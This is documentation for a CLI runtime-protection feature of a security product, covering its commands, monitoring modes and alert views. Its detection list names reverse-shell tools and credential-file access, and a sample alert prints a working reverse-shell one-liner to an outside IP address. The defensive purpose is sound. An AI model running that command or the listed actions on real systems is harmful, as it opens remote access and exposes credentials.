Runtime Protection

Premium

Runtime Protection provides real-time threat detection for running workloads. Auto-detects your environment and uses the best available monitoring solution.

Quick Start

# Start runtime protection (auto-detects best mode)
$ codephreak runtime-start

# Check protection status
$ codephreak runtime-status

# View security alerts
$ codephreak runtime-alerts

# Stop protection
$ codephreak runtime-stop

Hybrid Approach

CodePhreak automatically detects your environment and selects the best monitoring solution:

AWS GuardDuty

Zero install - uses AWS API

Auto-selected when AWS credentials detected

GCP Security Command Center

Zero install - uses GCP API

Auto-selected when GCP credentials detected

Falco Connector

Connects to existing Falco daemon

Auto-selected when Falco is running

Lightweight Monitor

Works everywhere - no dependencies

Universal fallback option

Protection Modes

# Auto-detect (default)
$ codephreak runtime-start

# Force specific mode
$ codephreak runtime-start --mode lightweight
$ codephreak runtime-start --mode guardduty --region us-east-1
$ codephreak runtime-start --mode gcp-scc --project my-project
$ codephreak runtime-start --mode falco

# Run in foreground (for testing)
$ codephreak runtime-start --foreground

Command Options

CommandDescription
runtime-startStart runtime protection monitoring
runtime-stopStop runtime protection
runtime-statusShow current protection status
runtime-alertsView detected security alerts

Viewing Alerts

# View alerts from last 24 hours
$ codephreak runtime-alerts

# Filter by severity
$ codephreak runtime-alerts --severity critical
$ codephreak runtime-alerts --severity high,critical

# View alerts from last 48 hours
$ codephreak runtime-alerts --since 48

# Watch alerts in real-time
$ codephreak runtime-alerts --watch

What It Detects

Reverse Shells

  • โ€ข nc, ncat, netcat connections
  • โ€ข bash -i interactive shells
  • โ€ข Python/Perl/Ruby one-liners
  • โ€ข Suspicious outbound connections

Reconnaissance

  • โ€ข nmap, masscan port scanning
  • โ€ข Internal network probing
  • โ€ข Service enumeration

Cryptominers

  • โ€ข xmrig, minerd processes
  • โ€ข High CPU usage anomalies
  • โ€ข Mining pool connections

Data Access

  • โ€ข /etc/passwd, /etc/shadow access
  • โ€ข SSH key reading
  • โ€ข Cloud metadata access (IMDS)
  • โ€ข Docker socket access

Example Alert

$ codephreak runtime-alerts --severity critical

๐Ÿšจ Critical Alerts (2)

โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”“
โ”‚ CRITICAL: Reverse shell detected                              โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚ Time:      2024-01-15T10:23:45Z                               โ”‚
โ”‚ Process:   /bin/bash                                          โ”‚
โ”‚ Command:   bash -i >& /dev/tcp/45.33.32.156/4444 0>&1        โ”‚
โ”‚ User:      www-data                                           โ”‚
โ”‚ PID:       12847                                              โ”‚
โ”‚ MITRE:     T1059.004 - Command and Scripting Interpreter     โ”‚
โ”‚                                                               โ”‚
โ”‚ Remediation: Terminate process, investigate container         โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

MITRE ATT&CK Mapping

All alerts are mapped to MITRE ATT&CK techniques for standardized threat classification:

  • T1059 - Command and Scripting Interpreter
  • T1046 - Network Service Discovery
  • T1496 - Resource Hijacking (Cryptomining)
  • T1552 - Unsecured Credentials
  • T1071 - Application Layer Protocol (C2)

State Persistence

Runtime state is persisted to ~/.codephreak/runtime_state.json, allowing status to be checked across CLI invocations:

$ codephreak runtime-status

    Runtime Protection Status     
โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ณโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”“
โ”ƒ Property         โ”ƒ Value                       โ”ƒ
โ”กโ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ•‡โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”โ”ฉ
โ”‚ Status           โ”‚ ๐ŸŸข Running                  โ”‚
โ”‚ Mode             โ”‚ lightweight                 โ”‚
โ”‚ Source           โ”‚ Lightweight Process Monitor โ”‚
โ”‚ Started At       โ”‚ 2024-01-15T10:00:00         โ”‚
โ”‚ Platform         โ”‚ darwin                      โ”‚
โ”‚ Recommended Mode โ”‚ lightweight                 โ”‚
โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”˜

Prerequisites by Mode

Lightweight (Zero Install)

Works everywhere with no additional setup.

AWS GuardDuty

AWS credentials configured, GuardDuty enabled in account.

GCP Security Command Center

GCP credentials configured, SCC API enabled.

Falco

Falco daemon running with socket at /var/run/falco/falco.sock

View Alerts in Dashboard

Runtime alerts are synced to the web dashboard with severity breakdown, MITRE ATT&CK links, and remediation guidance.

Try the Dashboard Demo